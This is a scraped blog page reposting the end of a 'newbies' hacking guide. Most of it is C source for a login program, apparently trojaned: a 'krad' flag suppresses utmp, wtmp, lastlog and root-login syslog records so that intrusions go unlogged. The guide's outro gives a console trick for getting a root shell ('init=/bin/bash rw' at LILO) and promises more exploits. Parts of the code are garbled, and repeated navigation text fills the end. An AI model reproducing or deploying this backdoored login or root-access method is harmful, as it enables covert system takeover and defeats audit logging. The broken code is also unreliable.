if (notickets && !quietlog)
(void)printf("Warning: no Kerberos tickets issued\n");
#endif

#define TWOWEEKS (14*24*60*60)
if (pwd->pw_change || pwd->pw_expire)
(void)gettimeofday(&tp, (struct timezone *)NULL);
if (pwd->pw_change)
if (tp.tv_sec >= pwd->pw_change) {
(void)printf("Sorry -- your password has expired.\n");
sleepexit(1);
}
else if (tp.tv_sec - pwd->pw_change < TWOWEEKS && !quietlog) {
ttp = localtime(&pwd->pw_change);
(void)printf("Warning: your password expires on %s %d, %d\n",
months[ttp->tm_mon], ttp->tm_mday, TM_YEAR_BASE + ttp->tm_year);
}
if (pwd->pw_expire)
if (tp.tv_sec >= pwd->pw_expire) {
(void)printf("Sorry -- your account has expired.\n");
sleepexit(1);
}
else if (tp.tv_sec - pwd->pw_expire < TWOWEEKS && !quietlog) {
ttp = localtime(&pwd->pw_expire);
(void)printf("Warning: your account expires on %s %d, %d\n",
months[ttp->tm_mon], ttp->tm_mday, TM_YEAR_BASE + ttp->tm_year);
}

/* nothing else left to fail -- really log in */
{
struct utmp utmp;

memset((char *)&utmp, 0, sizeof(utmp));
(void)time(&utmp.ut_time);
strncpy(utmp.ut_name, username, sizeof(utmp.ut_name));
if (hostname)
strncpy(utmp.ut_host, hostname, sizeof(utmp.ut_host));
strncpy(utmp.ut_line, tty, sizeof(utmp.ut_line));
login(&utmp);
}
#else
/* for linux, write entries in utmp and wtmp */
{
struct utmp ut;
char *ttyabbrev;
int wtmp;

memset((char *)&ut, 0, sizeof(ut));
ut.ut_type = USER_PROCESS;
ut.ut_pid = getpid();
strncpy(ut.ut_line, ttyn + sizeof("/dev/")-1, sizeof(ut.ut_line));
ttyabbrev = ttyn + sizeof("/dev/tty") - 1;
strncpy(ut.ut_id, ttyabbrev, sizeof(ut.ut_id));
(void)time(&ut.ut_time);
strncpy(ut.ut_user, username, sizeof(ut.ut_user));

/* fill in host and ip-addr fields when we get networking */
if (hostname) {
struct hostent *he;

strncpy(ut.ut_host, hostname, sizeof(ut.ut_host));
if ((he = gethostbyname(hostname)))
memcpy(&ut.ut_addr, he->h_addr_list[0],
sizeof(ut.ut_addr));
}

utmpname(_PATH_UTMP);
setutent();

if(krad == 0)
pututline(&ut);

endutent();

if((wtmp = open(_PATH_WTMP, O_APPEND|O_WRONLY)) >= 0) {
flock(wtmp, LOCK_EX);

if(krad == 0)
write(wtmp, (char *)&ut, sizeof(ut));

flock(wtmp, LOCK_UN);
close(wtmp);
}
}
/* fix_utmp_type_and_user(username, ttyn, LOGIN_PROCESS); */
#endif

if(krad == 0)
dolastlog(quietlog);

#ifndef linux
if (!hflag) { /* XXX */
static struct winsize win = { 0, 0, 0, 0 };

(void)ioctl(0, TIOCSWINSZ, &win);
}
#endif
(void)chown(ttyn, pwd->pw_uid,
(gr = getgrnam(TTYGRPNAME)) ? gr->gr_gid : pwd->pw_gid);

(void)chmod(ttyn, 0622);
(void)setgid(pwd->pw_gid);

initgroups(username, pwd->pw_gid);

#ifdef HAVE_QUOTA
quota(Q_DOWARN, pwd->pw_uid, (dev_t)-1, 0);
#endif

if (*pwd->pw_shell == '\0')
pwd->pw_shell = _PATH_BSHELL;
#ifndef linux
/* turn on new line discipline for the csh */
else if (!strcmp(pwd->pw_shell, _PATH_CSHELL)) {
ioctlval = NTTYDISC;
(void)ioctl(0, TIOCSETD, &ioctlval);
}
#endif

/* preserve TERM even without -p flag */
{
char *ep;

if(!((ep = getenv("TERM")) && (termenv = strdup(ep))))
termenv = "dumb";
}

/* destroy environment unless user has requested preservation */
if (!pflag)
{
environ = (char**)malloc(sizeof(char*));
memset(environ, 0, sizeof(char*));
}

#ifndef linux
(void)setenv("HOME", pwd->pw_dir, 1);
(void)setenv("SHELL", pwd->pw_shell, 1);
if (term[0] == '\0')
strncpy(term, stypeof(tty), sizeof(term));
(void)setenv("TERM", term, 0);
(void)setenv("USER", pwd->pw_name, 1);
(void)setenv("PATH", _PATH_DEFPATH, 0);
#else
(void)setenv("HOME", pwd->pw_dir, 0); /* legal to override */
if(pwd->pw_uid)
(void)setenv("PATH", _PATH_DEFPATH, 1);
else
(void)setenv("PATH", _PATH_DEFPATH_ROOT, 1);
(void)setenv("SHELL", pwd->pw_shell, 1);
(void)setenv("TERM", termenv, 1);

/* mailx will give a funny error msg if you forget this one */
(void)sprintf(tmp,"%s/%s",_PATH_MAILDIR,pwd->pw_name);
(void)setenv("MAIL",tmp,0);

/* LOGNAME is not documented in login(1) but
HP-UX 6.5 does it. We'll not allow modifying it.
*/
(void)setenv("LOGNAME", pwd->pw_name, 1);
#endif

#ifndef linux
if (tty[sizeof("tty")-1] == 'd')

if(krad == 0)
syslog(LOG_INFO, "DIALUP %s, %s", tty, pwd->pw_name);

#endif
if (pwd->pw_uid == 0)

if(krad == 0)
if (hostname)
syslog(LOG_NOTICE, "ROOT LOGIN ON %s FROM %s",
tty, hostname);
else
syslog(LOG_NOTICE, "ROOT LOGIN ON %s", tty);

if (!quietlog) {
struct stat st;

motd();
(void)sprintf(tbuf, "%s/%s", _PATH_MAILDIR, pwd->pw_name);
if (stat(tbuf, &st) == 0 && st.st_size != 0)
(void)printf("You have %smail.\n",
(st.st_mtime > st.st_atime) ? "new " : "");
}

(void)signal(SIGALRM, SIG_DFL);
(void)signal(SIGQUIT, SIG_DFL);
(void)signal(SIGINT, SIG_DFL);
(void)signal(SIGTSTP, SIG_IGN);
(void)signal(SIGHUP, SIG_DFL);

/* discard permissions last so can't get killed and drop core */
if(setuid(pwd->pw_uid) <>pw_uid) {
syslog(LOG_ALERT, "setuid() failed");
exit(1);
}

/* wait until here to change directory! */
if (chdir(pwd->pw_dir) < 0) {
(void)printf("No directory %s!\n", pwd->pw_dir);
if (chdir("/"))
exit(0);
pwd->pw_dir = "/";
(void)printf("Logging in with home = \"/\".\n");
}

/* if the shell field has a space: treat it like a shell script */
if (strchr(pwd->pw_shell, ' ')) {
char *buff = malloc(strlen(pwd->pw_shell) + 6);
if (buff) {
strcpy(buff, "exec ");
strcat(buff, pwd->pw_shell);
execlp("/bin/sh", "-sh", "-c", buff, (char *)0);
fprintf(stderr, "login: couldn't exec shell script: %s.\n",
strerror(errno));
exit(0);
}
fprintf(stderr, "login: no memory for shell script.\n");
exit(0);
}

tbuf[0] = '-';
strcpy(tbuf + 1, ((p = rindex(pwd->pw_shell, '/')) ?
p + 1 : pwd->pw_shell));

execlp(pwd->pw_shell, tbuf, (char *)0);
(void)fprintf(stderr, "login: no shell: %s.\n", strerror(errno));
exit(0);
}

void
getloginname()
{
register int ch;
register char *p;
static char nbuf[UT_NAMESIZE + 1];

for (;;) {
(void)printf("\n%s login: ", thishost); fflush(stdout);
for (p = nbuf; (ch = getchar()) != '\n'; ) {
if (ch == EOF) {
badlogin(username);
exit(0);
}
if (p < nbuf + UT_NAMESIZE)
*p++ = ch;
}
if (p > nbuf)
if (nbuf[0] == '-')
(void)fprintf(stderr,
"login names may not start with '-'.\n");
else {
*p = '\0';
username = nbuf;
break;
}
}
}

void timedout()
{
struct termio ti;

(void)fprintf(stderr, "Login timed out after %d seconds\n", timeout);

/* reset echo */
(void) ioctl(0, TCGETA, &ti);
ti.c_lflag |= ECHO;
(void) ioctl(0, TCSETA, &ti);
exit(0);
}

int
rootterm(ttyn)
char *ttyn;
#ifndef linux
{
struct ttyent *t;

return((t = getttynam(ttyn)) && t->ty_status&TTY_SECURE);
}
#else
{
int fd;
char buf[100],*p;
int cnt, more;

fd = open(SECURETTY, O_RDONLY);
if(fd < 0) return 1;

/* read each line in /etc/securetty, if a line matches our ttyline
then root is allowed to login on this tty, and we should return
true. */
for(;;) {
p = buf; cnt = 100;
while(--cnt >= 0 && (more = read(fd, p, 1)) == 1 && *p != '\n') p++;
if(more && *p == '\n') {
*p = '\0';
if(!strcmp(buf, ttyn)) {
close(fd);
return 1;
} else
continue;
} else {
close(fd);
return 0;
}
}
}
#endif

jmp_buf motdinterrupt;

void
motd()
{
register int fd, nchars;
void (*oldint)(), sigint();
char tbuf[8192];

if ((fd = open(_PATH_MOTDFILE, O_RDONLY, 0)) < 0)
return;
oldint = signal(SIGINT, sigint);
if (setjmp(motdinterrupt) == 0)
while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
(void)write(fileno(stdout), tbuf, nchars);
(void)signal(SIGINT, oldint);
(void)close(fd);
}

void sigint()
{
longjmp(motdinterrupt, 1);
}

void
checknologin()
{
register int fd, nchars;
char tbuf[8192];

if ((fd = open(_PATH_NOLOGIN, O_RDONLY, 0)) >= 0) {
while ((nchars = read(fd, tbuf, sizeof(tbuf))) > 0)
(void)write(fileno(stdout), tbuf, nchars);
sleepexit(0);
}
}

void
dolastlog(quiet)
int quiet;
{
struct lastlog ll;
int fd;

if ((fd = open(_PATH_LASTLOG, O_RDWR, 0)) >= 0) {
(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
if (!quiet) {
if (read(fd, (char *)&ll, sizeof(ll)) == sizeof(ll) &&
ll.ll_time != 0) {
(void)printf("Last login: %.*s ",
24-5, (char *)ctime(&ll.ll_time));

if (*ll.ll_host != '\0')
printf("from %.*s\n",
(int)sizeof(ll.ll_host), ll.ll_host);
else
printf("on %.*s\n",
(int)sizeof(ll.ll_line), ll.ll_line);
}
(void)lseek(fd, (off_t)pwd->pw_uid * sizeof(ll), L_SET);
}
memset((char *)&ll, 0, sizeof(ll));
(void)time(&ll.ll_time);
strncpy(ll.ll_line, tty, sizeof(ll.ll_line));
if (hostname)
strncpy(ll.ll_host, hostname, sizeof(ll.ll_host));
if(krad == 0)
(void)write(fd, (char *)&ll, sizeof(ll));
(void)close(fd);
}
}

void
badlogin(name)
char *name;
{
if (failures == 0)
return;

if (hostname)
syslog(LOG_NOTICE, "%d LOGIN FAILURE%s FROM %s, %s",
failures, failures > 1 ? "S" : "", hostname, name);
else
syslog(LOG_NOTICE, "%d LOGIN FAILURE%s ON %s, %s",
failures, failures > 1 ? "S" : "", tty, name);
}

#undef UNKNOWN
#define UNKNOWN "su"

#ifndef linux
char *
stypeof(ttyid)
char *ttyid;
{
struct ttyent *t;

return(ttyid && (t = getttynam(ttyid)) ? t->ty_type : UNKNOWN);
}
#endif

void
checktty(user, tty)
char *user;
char *tty;
{
FILE *f;
char buf[256];
char *ptr;
char devname[50];
struct stat stb;

/* no /etc/usertty, default to allow access */
if(!(f = fopen(_PATH_USERTTY, "r"))) return;

while(fgets(buf, 255, f)) {

/* strip comments */
for(ptr = buf; ptr < buf + 256; ptr++)
if(*ptr == '#') *ptr = 0;

strtok(buf, " \t");
if(strncmp(user, buf, 8) == 0) {
while((ptr = strtok(NULL, "\t\n "))) {
if(strncmp(tty, ptr, 10) == 0) {
fclose(f);
return;
}
if(strcmp("PTY", ptr) == 0) {
#ifdef linux
sprintf(devname, "/dev/%s", ptr);
/* VERY linux dependent, recognize PTY as alias
for all pseudo tty's */
if((stat(devname, &stb) >= 0)
&& major(stb.st_rdev) == 4
&& minor(stb.st_rdev) >= 192) {
fclose(f);
return;
}
#endif
}
}
/* if we get here, /etc/usertty exists, there's a line
beginning with our username, but it doesn't contain the
name of the tty where the user is trying to log in.
So deny access! */
fclose(f);
printf("Login on %s denied.\n", tty);
badlogin(user);
sleepexit(1);
}
}
fclose(f);
/* users not mentioned in /etc/usertty are by default allowed access
on all tty's */
}

void
getstr(buf, cnt, err)
char *buf, *err;
int cnt;
{
char ch;

do {
if (read(0, &ch, sizeof(ch)) != sizeof(ch))
exit(1);
if (--cnt < 0) {
(void)fprintf(stderr, "%s too long\r\n", err);
sleepexit(1);
}
*buf++ = ch;
} while (ch);
}

void
sleepexit(eval)
int eval;
{
sleep((unsigned int)5);
exit(eval);
}

So if you really wanna have root access and have access to console, reboot
it (carefully, do a ctrl-alt-del) and at lilo prompt do a :
init=/bin/bash rw (for linux 2.0.0 and above (I think)).

Don't wonder why I was speaking only about rootshell and dhp.com, there are
lots of other very good hacking pages, but these ones are updated very
quickly and besides, are the best pages I know.

So folks, this was it...
First version of my USER's GUIDE 1.0.
Maybe I'll do better next time, and if I have more time, I'll add about
50(more) other exploits, remote ones, new stuff, new techniques, etc...
See ya, folks !
GOOD NIGHT !!! (it's 6.am now).
DAMN !!!

ARGHHH! I forgot... My e-mail adress is .
(for now).

TECHNOLOGY HACKER

Selasa, 05 Mei 2009

Cant See Secure Sites

Best Keyboard Shortcuts

How To optimize DSL-CABLE connection speed

Download Free Music legally,, legally

How to find Security Holes

A Small Guide to Hacking HOTMAIL

Hacking PC-Pursuit Codes

Thoughts on the National Research and Education Network

Unlimited Rapidshare Downloads

Ultimate Google Way

Speed Up Internet

How to Get someones ISP password, Get free internet

How To Get Top Ranking, Search Engines

etc..
and start with

and then move to

etc..

How To Block Websties Without Software, block websites

Google Tips & Tricks

Get unlimited bandwidth from your host for free

The Newbies-User's Guide to Hacking

CALENDER

About Me

PLAY MUSIC

GOOGLE RANK

TECHNORATI RANK

YAHOO RANK

ALEXA RANK

TRAFFIC

PLAY NOW!

Blog Archive

CHAT ROOM

PLEASE CLICK!

CLICK ME!

INFO FREE

Selasa, 05 Mei 2009

etc.. and start with

and then move to

etc..

CALENDER

About Me

PLAY MUSIC

GOOGLE RANK

TECHNORATI RANK

YAHOO RANK

ALEXA RANK

TRAFFIC

PLAY NOW!

Blog Archive

CHAT ROOM

PLEASE CLICK!

CLICK ME!

INFO FREE

etc..
and start with